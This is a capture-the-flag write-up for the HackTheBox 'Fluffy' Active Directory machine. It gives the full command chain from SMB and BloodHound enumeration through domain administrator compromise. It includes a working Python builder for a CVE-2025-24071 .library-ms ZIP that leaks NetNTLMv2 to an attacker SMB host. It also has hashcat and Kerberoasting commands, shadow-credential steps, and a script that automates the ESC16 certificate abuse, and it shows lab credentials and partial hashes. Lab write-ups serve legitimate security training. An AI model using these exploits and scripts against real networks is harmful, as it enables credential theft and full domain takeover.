Setup
mkdir -p ~/ctf/HackTheBox/fluffy/scans; cd ~/ctf/HackTheBox/fluffy
IP Address: 10.10.11.69
echo "10.10.11.69 fluffy.htb" | sudo tee -a /etc/hosts
10.10.11.69 fluffy.htb
Enumeration
nmap -sC -sV -Pn -p- fluffy.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 fluffy.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-06-01 19:20:02Z)
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T19:21:32+00:00; +6h38m39s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-06-01T19:21:33+00:00; +6h38m39s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T19:21:32+00:00; +6h38m39s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T19:21:33+00:00; +6h38m39s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49685/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc syn-ack Microsoft Windows RPC
49688/tcp open msrpc syn-ack Microsoft Windows RPC
49703/tcp open msrpc syn-ack Microsoft Windows RPC
49717/tcp open msrpc syn-ack Microsoft Windows RPC
49749/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
As this is an assumed-breach challenge, we start with the credentials j.fleischman:J0elTHEM4n1990!
Initial enumeration with netexec lists the domain users and the SMB shares:
Of the shares, IT is the one that matters: our user has READ,WRITE on it, so we can drop files there that other users will open.
Using smbclient.py fluffy.htb/'j.fleischman':'J0elTHEM4n1990!'@10.10.11.69
We see the following files:
in Upgrade_Notice.pdf:
Collecting BloodHound data with rusthound -d fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' -o 'bloodhound' -z -i 10.10.11.69 --adcs
(--adcs also pulls the certificate templates and CA objects) shows that our user is a member of the CERTIFICATE SERVICE DCOM ACCESS group.
Using the public exploit for CVE-2025-24071 (Windows Explorer initiates an outbound SMB authentication when it extracts a crafted .library-ms file from an archive), we place the archive in the writable IT share and capture the resulting authentication on our host.
This gives us the NetNTLMv2 challenge-response for p.agila:
p.agila::FLUFFY:17292a964fdb3998:BBFD39********************************************************
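The delivery mechanism behind CVE-2025-24071, as an added example (this is not the page's own code nor the PoC the author ran): the trigger is a Windows Library Description (.library-ms) file whose only search-connector location is an SMB UNC path; when Explorer extracts it from an archive it resolves that location, and the outbound SMB connection carries the extracting user's NetNTLMv2 response. The script builds such an archive in memory and reads it back as a check before upload. The attacker address 10.10.14.5, the share name and the archive/member names are assumed placeholders.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespace of the Windows Library Description schema used by .library-ms files.
LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"


def build_library_ms(unc_path: str) -> str:
    """Return a .library-ms document whose single search connector points at
    unc_path. Explorer resolves that location when it parses the file; for an
    SMB UNC path that means an authenticated connection to the named host."""
    if not unc_path.startswith("\\\\"):
        raise ValueError("unc_path must be a UNC path such as \\\\host\\share")
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{LIBRARY_NS}">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>{escape(unc_path)}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def build_archive(unc_path: str, member_name: str = "Upgrade_Notice.library-ms") -> bytes:
    """Pack the .library-ms into a ZIP held in memory. The file is delivered
    inside an archive because Explorer parses it on extraction."""
    if not member_name.endswith(".library-ms"):
        raise ValueError("member must keep the .library-ms extension")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, build_library_ms(unc_path))
    return buf.getvalue()


def archive_target(zip_bytes: bytes) -> str:
    """Read the archive back and return the UNC path Explorer would contact,
    as a sanity check that the right listener address went in."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = [n for n in zf.namelist() if n.endswith(".library-ms")]
        if len(names) != 1:
            raise ValueError("archive must contain exactly one .library-ms")
        root = ET.fromstring(zf.read(names[0]))
    url = root.find(f".//{{{LIBRARY_NS}}}url")
    if url is None or not url.text:
        raise ValueError("no simpleLocation/url in library description")
    return url.text


if __name__ == "__main__":
    import sys
    # Attacker host running the SMB listener; 10.10.14.5 is an assumed placeholder.
    attacker = sys.argv[1] if len(sys.argv) > 1 else "10.10.14.5"
    data = build_archive(f"\\\\{attacker}\\share")
    with open("Upgrade_Notice.zip", "wb") as fh:
        fh.write(data)
    print("wrote Upgrade_Notice.zip ->", archive_target(data))
```

Start an SMB capture on the attacker host (for example `responder -I tun0`), copy the ZIP into the IT share, and the NetNTLMv2 response arrives when a user on the box extracts it. The value captured is a challenge-response against the listener's challenge, not an NT hash, so it cannot be relayed into pass-the-hash; it has to be cracked offline.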
Because this is a NetNTLMv2 challenge-response rather than an NT hash, it cannot be passed; it has to be cracked, and hashcat mode 5600 is the NetNTLMv2 format:
hashcat -m 5600 p_agila.hash /usr/share/wordlists/rockyou.txt
p.agila:pr**********************
p.agila has GenericAll on the Service Accounts group, whose members are winrm_svc, ldap_svc and ca_svc. GenericAll on a group lets p.agila add itself as a member and inherit whatever rights the group holds over those accounts; the shadow credential attack below depends on that, since it writes the target's msDS-KeyCredentialLink attribute. All three accounts have SPNs set, so they are also Kerberoastable.
Using GetUserSPNs.py -request -dc-ip 10.10.11.69 'fluffy.htb'/'p.agila':'pro***************'
we get the krb5tgs (TGS-REP, etype 23) hashes, but hashcat (mode 13100) cracks none of them against rockyou.
Using pywhisker we perform a shadow credential attack: it adds a key pair to winrm_svc's msDS-KeyCredentialLink, PKINIT with the matching certificate yields a TGT, and getnthash.py uses that TGT plus the AS-REP key to recover the account's NT hash (a U2U ticket's PAC carries it). The Kerberos steps need our clock within 5 minutes of the DC; the nmap ssl-date lines show the DC running 6h38m ahead of us, so sync time first.
python3 pywhisker/pywhisker.py -d 'fluffy.htb' -u "p.agila" -p 'pro***************' --target 'winrm_svc' --action "add" --filename winrm_svc
python3 gettgtpkinit.py -cert-pfx ~/AD_Scripts/pywhisker/winrm_svc.pfx -pfx-pass '2STlYKkYncUlHZk1IQjH' fluffy.htb/winrm_svc winrm.ccache
With KRB5CCNAME pointing at winrm.ccache and the AS-REP encryption key printed by gettgtpkinit:
python3 getnthash.py -key 665a7b********************** fluffy.htb/winrm_svc
We get the NT hash winrm_svc:33bd0******************************
The whole chain can be done in one step with certipy, which prints the NT hash directly:
certipy shadow auto -u 'p.agila@fluffy.htb' -p 'pro***************' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
User Flag
Location: C:\Users\winrm_svc\Desktop\user.txt | Flag: 4c7*************************
Privilege Escalation
The same shadow credential attack against ca_svc gives us its NT hash:
ca_svc:ca0f4f**********************
Running certipy's find module as ca_svc shows that the CA fluffy-DC01-CA is vulnerable to ESC16: the CA has the szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2) SID extension disabled for every certificate it issues, so a DC in certificate-mapping compatibility mode maps its certificates by UPN instead of by SID. Anyone who can rewrite the UPN of an account they control can therefore obtain a certificate that authenticates as any other account. Following the certipy ESC16 guide:
Step 1: Read initial UPN of the ca_svc account
certipy account -u 'p.agila@fluffy.htb' -p 'pro***************' -dc-ip '10.10.11.69' -user 'ca_svc' read
Step 2: Update the ca_svc account’s UPN to the administrator’s sAMAccountName.
certipy account -u 'p.agila@fluffy.htb' -p 'pro***************' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
Step 3: Obtain credentials for the “ca_svc” account (via Shadow Credentials).
certipy shadow -u 'p.agila@fluffy.htb' -p 'pro***************' -dc-ip '10.10.11.69' -account 'ca_svc' auto
export KRB5CCNAME=ca_svc.ccache
Step 4: Request a certificate as the “ca_svc” user from any suitable client authentication template (e.g., “User”) on the ESC16-vulnerable CA. Because the CA is vulnerable to ESC16, it will automatically omit the SID security extension from the issued certificate, regardless of the template’s specific settings for this extension.
certipy req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'
Step 5: Revert the “ca_svc” account’s UPN.
certipy account -u 'p.agila@fluffy.htb' -p 'pro***************' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Step 6: Authenticate as the target administrator.
certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
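The shadow credential attack (used above for winrm_svc and ca_svc, and again as step 3) and the six ESC16 steps together, as an added example that is neither the page's own code nor part of certipy. It drives the same certipy commands through subprocess with two things the manual sequence lacks: the argv for each step is built separately from execution, so the exact chain can be reviewed before anything touches the DC, and the UPN revert (step 5) sits in a finally block so ca_svc is restored even if enrolment fails. DC, CA, template and account names are the ones from this box; the p.agila password is read from a CTRL_PASS environment variable, which is an assumption of this script (the page redacts it).

```python
import os
import subprocess
from dataclasses import dataclass


@dataclass(frozen=True)
class Esc16Config:
    """Parameters of one ESC16 run. The controller password is deliberately
    not embedded; the __main__ block reads it from the environment."""
    dc_ip: str
    dc_fqdn: str
    domain: str
    ca: str
    template: str
    ctrl_user: str   # account with write rights over the victim (p.agila)
    ctrl_pass: str
    victim: str      # account whose UPN gets rewritten (ca_svc)
    target: str      # sAMAccountName we want a certificate for (administrator)


def ccache_path(cfg: Esc16Config) -> str:
    """certipy shadow auto saves the victim's TGT as <account>.ccache."""
    return os.path.abspath(f"{cfg.victim}.ccache")


def esc16_commands(cfg: Esc16Config) -> dict:
    """Build the argv for every step without running anything, so the exact
    commands can be inspected (and tested) offline."""
    creds = ["-u", f"{cfg.ctrl_user}@{cfg.domain}", "-p", cfg.ctrl_pass, "-dc-ip", cfg.dc_ip]
    account = ["certipy", "account", *creds, "-user", cfg.victim]
    return {
        # 1. record the victim's current UPN (what step 5 must restore)
        "read": [*account, "read"],
        # 2. set the UPN to the target's bare sAMAccountName, no @domain suffix,
        #    so UPN-based certificate mapping resolves it to the target account
        "set_upn": [*account, "-upn", cfg.target, "update"],
        # 3. shadow credentials: writes a key to msDS-KeyCredentialLink, PKINITs
        #    as the victim, prints its NT hash and leaves a TGT in <victim>.ccache
        "shadow": ["certipy", "shadow", *creds, "-account", cfg.victim, "auto"],
        # 4. enrol with that TGT; an ESC16 CA omits the SID extension, so the
        #    certificate is identified only by the UPN set in step 2
        "req": ["certipy", "req", "-k", "-dc-ip", cfg.dc_ip, "-target", cfg.dc_fqdn,
                "-ca", cfg.ca, "-template", cfg.template],
        # 5. put the UPN back
        "revert_upn": [*account, "-upn", f"{cfg.victim}@{cfg.domain}", "update"],
        # 6. PKINIT as the target with the issued certificate; certipy prints its NT hash
        "auth": ["certipy", "auth", "-dc-ip", cfg.dc_ip, "-pfx", f"{cfg.target}.pfx",
                 "-username", cfg.target, "-domain", cfg.domain],
    }


def run_chain(cfg: Esc16Config, run=subprocess.run) -> None:
    """Execute the chain in page order. `run` is injectable so the ordering can
    be tested without a DC. The revert is in a finally block: a failed
    enrolment must not leave the victim's UPN pointing at the target."""
    cmds = esc16_commands(cfg)
    run(cmds["read"], check=True)
    run(cmds["set_upn"], check=True)
    try:
        run(cmds["shadow"], check=True)
        # certipy req -k takes its ticket from KRB5CCNAME
        env = dict(os.environ, KRB5CCNAME=ccache_path(cfg))
        run(cmds["req"], check=True, env=env)
    finally:
        run(cmds["revert_upn"], check=True)
    run(cmds["auth"], check=True)


if __name__ == "__main__":
    FLUFFY = Esc16Config(
        dc_ip="10.10.11.69", dc_fqdn="DC01.FLUFFY.HTB", domain="fluffy.htb",
        ca="fluffy-DC01-CA", template="User",
        ctrl_user="p.agila", ctrl_pass=os.environ["CTRL_PASS"],  # assumed env var
        victim="ca_svc", target="administrator",
    )
    run_chain(FLUFFY)
```

The DC clock is 6h38m ahead of ours (see the nmap ssl-date lines), and Kerberos rejects anything more than 5 minutes out, so sync with ntpdate or wrap the run in faketime before steps 3 and 4, otherwise PKINIT fails with a clock-skew error. Step 1 is worth keeping even though the script hard-codes the revert value: its output is the record that the UPN was ca_svc@fluffy.htb before we touched it.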
certipy auth prints the administrator NT hash; passing it to WinRM (evil-winrm -H) gives an administrator shell.
Root Flag
Location: C:\Users\Administrator\Desktop\root.txt | Flag: 3a58***********************